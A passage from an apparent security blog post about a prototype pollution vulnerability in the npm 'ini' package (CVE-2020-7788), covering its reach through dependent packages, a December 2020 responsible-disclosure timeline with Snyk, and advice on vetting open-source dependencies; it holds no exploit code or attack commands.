This is because almost 2000 dependent packages use ini, including the npm CLI itself! Since npm comes packaged with each default Node.js installation, this means that every user of Node.js was downloading the vulnerable ini package as well. Other notable dependents include the Angular CLI and sodium-native, a wrapper around the libsodium cryptography library. While these packages included ini as a dependency, their risk depended on how ini was used; if they did not call the vulnerable function, the vulnerability would not be triggered.

Packages that depend on ini.

Although I did not use ini for the challenge, I made sure to responsibly disclose the list of vulnerable packages to npm.

Responsible Disclosure

npm supports a robust responsible disclosure process, including a currently-on-hold vulnerability disclosure program. The open source security company Snyk also provides a simple vulnerability disclosure form, which I used to coordinate the disclosures. Fortunately, the disclosure process for ini went smoothly, with the developer patching the vulnerability in two ddays.

  • December 6, 2020: Initial disclosure to Snyk
  • December 7, 2020: First response from Snyk
  • December 8, 2020: Disclosure to Developer
  • December 10, 2020: Patch issued
  • December 10, 2020: Disclosure published
  • December 11, 2020: CVE-2020–7788 assigned

Other packages are undergoing responsible disclosure or have been disclosed, such as multi-ini.

The vulnerability-hunting process highlighted both the strengths and weaknesses of open source packages. Although open source packages written by third parties can be analysed for vulnerabilities or compromised by malicious actors, developers can also quickly find, report, and patch the vulnerabilities. It remains the responsibility of the organisations and developers to vet packages before using them. While not everyone can afford the resources needed to inspect the code directly, there are free tools such as Snyk Advisor that use metrics such as update frequency and contribution history to estimate a package's health. Developers should also vet new versions of packages, especially if they were written by a different author or published at an irregular timing.

In the long run, there are no easy answers to open source package security. Nevertheless, organisations can apply sensible measures to effectively secure their projects.

P.S. One of our participants, Yeo Quan Yang, posted an excellent write-up on the challenge that illustrated the intended solution to chain a prototype pollution in a package with a remote code execution gadget in a templating engine. Check it out here!

❌
❌